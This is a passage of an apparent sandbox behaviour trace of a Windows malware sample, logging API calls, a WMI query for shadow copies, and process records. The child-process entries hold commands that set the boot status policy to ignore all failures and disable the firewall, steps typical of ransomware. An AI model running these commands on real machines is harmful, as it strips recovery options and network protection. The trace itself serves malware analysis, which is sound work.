pCtx=0x0, ppNamespace=0x7ff7194e78d0 | out: ppNamespace=0x7ff7194e78d0*=0x1899e582460) returned 0x0 [0144.413] free (_Block=0x1899e8ddd10) [0144.413] free (_Block=0x1899e8ddcf0) [0144.414] free (_Block=0x1899e8ddaf0) [0144.414] CoSetProxyBlanket (pProxy=0x1899e582460, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0144.414] free (_Block=0x1899e8ddf90) [0144.414] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0144.414] ??0CHString@@QEAA@XZ () returned 0x26d57ff510 [0144.414] GetCurrentThreadId () returned 0xfb4 [0144.414] malloc (_Size=0x18) returned 0x1899e8ddcf0 [0144.414] lstrlenA (lpString="") returned 0 [0144.414] malloc (_Size=0x2) returned 0x1899e8d1790 [0144.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7194cc40c, cbMultiByte=-1, lpWideCharStr=0x1899e8d1790, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0144.414] free (_Block=0x1899e8d1790) [0144.414] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0144.414] SysStringLen (param_1="") returned 0x0 [0144.414] free (_Block=0x1899e8ddcf0) [0144.414] malloc (_Size=0x18) returned 0x1899e8ddf50 [0144.414] IWbemServices:ExecQuery (in: This=0x1899e582460, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x26d57ff520 | out: ppEnum=0x26d57ff520*=0x0) returned 0x80041014 [0146.307] free (_Block=0x1899e8ddf50) [0146.307] _CxxThrowException () [0146.308] malloc (_Size=0x20) returned 0x1899e8dec00 [0146.308] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0146.308] free (_Block=0x1899e8ddf30) [0146.308] free (_Block=0x1899e8ddfd0) [0146.308] GetCurrentThreadId () returned 0xfb4 [0146.309] ??0CHString@@QEAA@PEBG@Z () returned 0x26d57ff708 [0146.309] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x26d57ff708 [0146.309] ??0CHString@@QEAA@XZ () returned 0x26d57ff4b0 [0146.309] malloc (_Size=0x18) returned 0x1899e8ddc10 [0146.309] malloc (_Size=0x18) returned 0x1899e8dd9b0 [0146.309] SysStringLen (param_1="") returned 0x0 [0146.309] free (_Block=0x1899e8ddc10) [0146.309] CoCreateInstance (in: rclsid=0x7ff7194d05a8*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7194d05b8*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x7ff7194e78f8 | out: ppv=0x7ff7194e78f8*=0x1899e56bcb0) returned 0x0 [0146.533] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1899e56bcb0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x26d57ff4a8 | out: MessageText=0x26d57ff4a8*="Initialization failure\r\n") returned 0x0 [0146.543] free (_Block=0x1899e8dd9b0) [0146.543] malloc (_Size=0x18) returned 0x1899e8dd930 [0146.543] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x1899e56bcb0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x26d57ff4a0 | out: MessageText=0x26d57ff4a0*="WMI") returned 0x0 [0146.544] malloc (_Size=0x18) returned 0x1899e8ddab0 [0146.544] lstrlenW (lpString="WMI") returned 3 [0146.544] lstrlenW (lpString="Wbem") returned 4 [0146.544] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0146.544] lstrlenW (lpString="WMI") returned 3 [0146.544] lstrlenW (lpString="WMI") returned 3 [0146.544] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0146.544] WbemStatusCodeText:IUnknown:Release (This=0x1899e56bcb0) returned 0x0 [0146.544] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0146.544] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x26d57fed10, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0146.544] FormatMessageW (in: dwFlags=0x2500, lpSource=0x26d57fed10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26d57fece0, nSize=0x0, Arguments=0x26d57fece8 | out: lpBuffer="\x7bb0\x9e58\x189") returned 0x2e [0146.544] malloc (_Size=0x18) returned 0x1899e8ddd50 [0146.544] LocalFree (hMem=0x1899e587bb0) returned 0x0 [0146.544] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0146.544] malloc (_Size=0x2f) returned 0x1899e8da510 [0146.545] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x1899e8da510, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0146.545] __iob_func () returned 0x7ffe6a89ea00 [0146.545] fprintf (in: _File=0x7ffe6a89ea60, _Format="%s" | out: _File=0x7ffe6a89ea60) returned 46 [0146.546] __iob_func () returned 0x7ffe6a89ea00 [0146.546] fflush (in: _File=0x7ffe6a89ea60 | out: _File=0x7ffe6a89ea60) returned 0 [0146.546] free (_Block=0x1899e8da510) [0146.546] free (_Block=0x1899e8ddd50) [0146.546] free (_Block=0x1899e8ddab0) [0146.547] free (_Block=0x1899e8dd930) [0146.547] ??1CHString@@QEAA@XZ () returned 0x1 [0146.547] ??0CHString@@QEAA@PEBG@Z () returned 0x26d57ff6f0 [0146.547] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x26d57ff6f0 [0146.547] GetCurrentThreadId () returned 0xfb4 [0146.547] ??1CHString@@QEAA@XZ () returned 0x1 [0146.547] WbemLocator:IUnknown:Release (This=0x1899e582460) returned 0x0 [0146.547] ?Empty@CHString@@QEAAXXZ () returned 0x7ffe5fac674c [0146.547] free (_Block=0x1899e8dec00) [0146.547] _kbhit () returned 0x0 [0147.468] free (_Block=0x1899e8debe0) [0147.468] free (_Block=0x1899e8dda50) [0147.468] free (_Block=0x1899e8ddf10) [0147.468] free (_Block=0x1899e8ddef0) [0147.468] free (_Block=0x1899e8dd910) [0147.468] free (_Block=0x1899e8d6000) [0147.468] free (_Block=0x1899e8ddeb0) [0147.468] free (_Block=0x1899e8da490) [0147.468] free (_Block=0x1899e8dddd0) [0147.468] free (_Block=0x1899e8deb40) [0147.468] free (_Block=0x1899e8dd890) [0147.468] free (_Block=0x1899e8ddbd0) [0147.468] free (_Block=0x1899e8debc0) [0147.469] free (_Block=0x1899e8d5fb0) [0147.469] free (_Block=0x1899e8deb90) [0147.469] ?Empty@CHString@@QEAAXXZ () returned 0x7ffe5fac674c [0147.469] free (_Block=0x1899e8de050) [0147.469] free (_Block=0x1899e8dddb0) [0147.469] free (_Block=0x1899e8dda10) [0147.469] free (_Block=0x1899e8d5a80) [0147.469] free (_Block=0x1899e8d5ad0) [0147.469] free (_Block=0x1899e8d5b20) [0147.469] free (_Block=0x1899e8ddad0) [0147.469] free (_Block=0x1899e8d5bd0) [0147.469] free (_Block=0x1899e8d5f90) [0147.469] free (_Block=0x1899e8da6d0) [0147.469] free (_Block=0x1899e8d5f70) [0147.469] free (_Block=0x1899e8daa50) [0147.469] free (_Block=0x1899e8d5f10) [0147.469] free (_Block=0x1899e8d5f30) [0147.469] free (_Block=0x1899e8d5df0) [0147.469] free (_Block=0x1899e8d5e10) [0147.469] free (_Block=0x1899e8d5d90) [0147.469] free (_Block=0x1899e8d5db0) [0147.469] free (_Block=0x1899e8d5e50) [0147.469] free (_Block=0x1899e8d5e70) [0147.469] free (_Block=0x1899e8d5eb0) [0147.469] free (_Block=0x1899e8d5ed0) [0147.469] free (_Block=0x1899e8d5cd0) [0147.469] free (_Block=0x1899e8d5cf0) [0147.469] free (_Block=0x1899e8d5c70) [0147.470] free (_Block=0x1899e8d5c90) [0147.470] free (_Block=0x1899e8d5d30) [0147.470] free (_Block=0x1899e8d5d50) [0147.470] free (_Block=0x1899e8d5c10) [0147.470] free (_Block=0x1899e8d5c30) [0147.470] free (_Block=0x1899e8d5ba0) [0147.470] free (_Block=0x1899e8d5b70) [0147.470] free (_Block=0x1899e8db420) [0147.470] WbemLocator:IUnknown:Release (This=0x1899e52bbe0) returned 0x2 [0147.470] WbemLocator:IUnknown:Release (This=0x1899e581b60) returned 0x0 [0147.470] WbemLocator:IUnknown:Release (This=0x1899e581ec0) returned 0x0 [0147.471] WbemLocator:IUnknown:Release (This=0x1899e52bbe0) returned 0x1 [0147.471] ?Empty@CHString@@QEAAXXZ () returned 0x7ffe5fac674c [0147.471] WbemLocator:IUnknown:Release (This=0x1899e52bbe0) returned 0x0 [0147.471] free (_Block=0x1899e8ddb10) [0147.471] free (_Block=0x1899e8ddcd0) [0147.471] free (_Block=0x1899e8da550) [0147.471] free (_Block=0x1899e8dde30) [0147.471] free (_Block=0x1899e8dde90) [0147.471] free (_Block=0x1899e8da750) [0147.471] free (_Block=0x1899e8db160) [0147.471] free (_Block=0x1899e8db1a0) [0147.471] free (_Block=0x1899e8da650) [0147.471] free (_Block=0x1899e8ddc30) [0147.471] free (_Block=0x1899e8dde50) [0147.471] free (_Block=0x1899e8da890) [0147.471] free (_Block=0x1899e8db300) [0147.471] free (_Block=0x1899e8db0a0) [0147.471] free (_Block=0x1899e8da910) [0147.471] free (_Block=0x1899e8db0c0) [0147.471] free (_Block=0x1899e8db120) [0147.471] free (_Block=0x1899e8da810) [0147.471] free (_Block=0x1899e8dded0) [0147.471] free (_Block=0x1899e8dddf0) [0147.471] free (_Block=0x1899e8da8d0) [0147.471] free (_Block=0x1899e8dde10) [0147.472] free (_Block=0x1899e8ddcb0) [0147.472] free (_Block=0x1899e8da450) [0147.472] free (_Block=0x1899e8db3c0) [0147.472] free (_Block=0x1899e8db100) [0147.472] free (_Block=0x1899e8da7d0) [0147.472] free (_Block=0x1899e8db3a0) [0147.472] free (_Block=0x1899e8db080) [0147.472] free (_Block=0x1899e8da850) [0147.472] free (_Block=0x1899e8dd950) [0147.472] free (_Block=0x1899e8dde70) [0147.472] free (_Block=0x1899e8daa10) [0147.472] free (_Block=0x1899e8ddb70) [0147.472] free (_Block=0x1899e8dda70) [0147.472] free (_Block=0x1899e8dab90) [0147.472] free (_Block=0x1899e8db360) [0147.472] free (_Block=0x1899e8db3e0) [0147.472] free (_Block=0x1899e8da590) [0147.472] free (_Block=0x1899e8db320) [0147.472] free (_Block=0x1899e8db200) [0147.472] free (_Block=0x1899e8da9d0) [0147.472] free (_Block=0x1899e8db260) [0147.472] free (_Block=0x1899e8db060) [0147.472] free (_Block=0x1899e8daad0) [0147.472] free (_Block=0x1899e8db340) [0147.472] free (_Block=0x1899e8db280) [0147.472] free (_Block=0x1899e8da950) [0147.472] free (_Block=0x1899e8db380) [0147.473] free (_Block=0x1899e8db0e0) [0147.473] free (_Block=0x1899e8daa90) [0147.473] free (_Block=0x1899e8db240) [0147.473] free (_Block=0x1899e8db140) [0147.473] free (_Block=0x1899e8dab10) [0147.473] free (_Block=0x1899e8db220) [0147.473] free (_Block=0x1899e8db2a0) [0147.473] free (_Block=0x1899e8dab50) [0147.473] free (_Block=0x1899e8db2c0) [0147.473] free (_Block=0x1899e8db2e0) [0147.473] free (_Block=0x1899e8da990) [0147.473] free (_Block=0x1899e8db1e0) [0147.473] free (_Block=0x1899e8db180) [0147.473] free (_Block=0x1899e8da790) [0147.473] CoUninitialize () [0147.927] exit (_Code=-2147217388) [0147.929] free (_Block=0x1899e8da4d0) [0147.929] free (_Block=0x1899e8d6c40) [0147.929] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0147.929] free (_Block=0x1899e8db4b0) [0147.929] free (_Block=0x1899e8d5bf0) [0147.929] free (_Block=0x1899e8d6c00) [0147.929] free (_Block=0x1899e8d1750) [0147.929] free (_Block=0x1899e8d1700) [0147.929] free (_Block=0x1899e8d16c0) [0147.929] free (_Block=0x1899e8d1660) [0147.929] free (_Block=0x1899e8d15e0) [0147.929] free (_Block=0x1899e8d15a0) [0147.929] ??1CHString@@QEAA@XZ () returned 0x7ffe5fac674c [0147.929] free (_Block=0x1899e8de010) Thread: id = 109 os_tid = 0xfbc Thread: id = 121 os_tid = 0xfec Thread: id = 122 os_tid = 0xff0 Thread: id = 123 os_tid = 0xff4 Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1492000" os_pid = "0x3c0" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0xfb0" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a284" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 124 os_tid = 0xab8 Thread: id = 125 os_tid = 0xa9c Thread: id = 126 os_tid = 0xa7c Thread: id = 127 os_tid = 0xa78 Thread: id = 128 os_tid = 0xa54 Thread: id = 129 os_tid = 0x9b8 Thread: id = 130 os_tid = 0x9b4 Thread: id = 131 os_tid = 0x9a0 Thread: id = 132 os_tid = 0x99c Thread: id = 133 os_tid = 0x988 Thread: id = 134 os_tid = 0x980 Thread: id = 135 os_tid = 0x97c Thread: id = 136 os_tid = 0x970 Thread: id = 137 os_tid = 0x940 Thread: id = 138 os_tid = 0x93c Thread: id = 139 os_tid = 0x8f8 Thread: id = 140 os_tid = 0x8c8 Thread: id = 141 os_tid = 0x8a8 Thread: id = 142 os_tid = 0x888 Thread: id = 143 os_tid = 0x880 Thread: id = 144 os_tid = 0x874 Thread: id = 145 os_tid = 0x86c Thread: id = 146 os_tid = 0x860 Thread: id = 147 os_tid = 0x858 Thread: id = 148 os_tid = 0x854 Thread: id = 149 os_tid = 0x848 Thread: id = 150 os_tid = 0x840 Thread: id = 151 os_tid = 0x830 Thread: id = 152 os_tid = 0x82c Thread: id = 153 os_tid = 0x7f4 Thread: id = 154 os_tid = 0x60c Thread: id = 155 os_tid = 0x43c Thread: id = 156 os_tid = 0x7d4 Thread: id = 157 os_tid = 0x7c8 Thread: id = 158 os_tid = 0x7b8 Thread: id = 159 os_tid = 0x7a0 Thread: id = 160 os_tid = 0x798 Thread: id = 161 os_tid = 0x794 Thread: id = 162 os_tid = 0x790 Thread: id = 163 os_tid = 0x730 Thread: id = 164 os_tid = 0x6f8 Thread: id = 165 os_tid = 0x680 Thread: id = 166 os_tid = 0x5f4 Thread: id = 167 os_tid = 0x5ec Thread: id = 168 os_tid = 0x5c8 Thread: id = 169 os_tid = 0x550 Thread: id = 170 os_tid = 0x4c0 Thread: id = 171 os_tid = 0x474 Thread: id = 172 os_tid = 0x444 Thread: id = 173 os_tid = 0x440 Thread: id = 174 os_tid = 0x42c Thread: id = 175 os_tid = 0x41c Thread: id = 176 os_tid = 0x414 Thread: id = 177 os_tid = 0x408 Thread: id = 178 os_tid = 0x404 Thread: id = 179 os_tid = 0x174 Thread: id = 180 os_tid = 0x39c Thread: id = 181 os_tid = 0x2fc Thread: id = 182 os_tid = 0x2f8 Thread: id = 183 os_tid = 0x8 Thread: id = 184 os_tid = 0x244 Thread: id = 185 os_tid = 0x29c Thread: id = 186 os_tid = 0x3cc Thread: id = 187 os_tid = 0x3c4 Thread: id = 199 os_tid = 0xff8 Thread: id = 200 os_tid = 0xffc Thread: id = 201 os_tid = 0x764 Thread: id = 202 os_tid = 0xa0c Thread: id = 203 os_tid = 0xc34 Thread: id = 204 os_tid = 0x79c Thread: id = 205 os_tid = 0x588 Thread: id = 206 os_tid = 0x2bc Thread: id = 207 os_tid = 0x380 Process: id = "21" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x308c6000" os_pid = "0xd8c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x3c0" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000374a2" [0xc000000f] Thread: id = 188 os_tid = 0xdb8 Thread: id = 189 os_tid = 0xdb4 Thread: id = 190 os_tid = 0xdb0 Thread: id = 191 os_tid = 0xdac Thread: id = 192 os_tid = 0xda8 Thread: id = 193 os_tid = 0xda4 Thread: id = 194 os_tid = 0xda0 Thread: id = 195 os_tid = 0xd9c Thread: id = 196 os_tid = 0xd98 Thread: id = 197 os_tid = 0xd94 Thread: id = 198 os_tid = 0xd90 Process: id = "22" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x290f0000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xf30" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 208 os_tid = 0xa80 Thread: id = 209 os_tid = 0xcf0 Process: id = "23" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x2971d000" os_pid = "0x580" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xf38" cmd_line = "netsh firewall set opmode mode=disable" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 210 os_tid = 0x584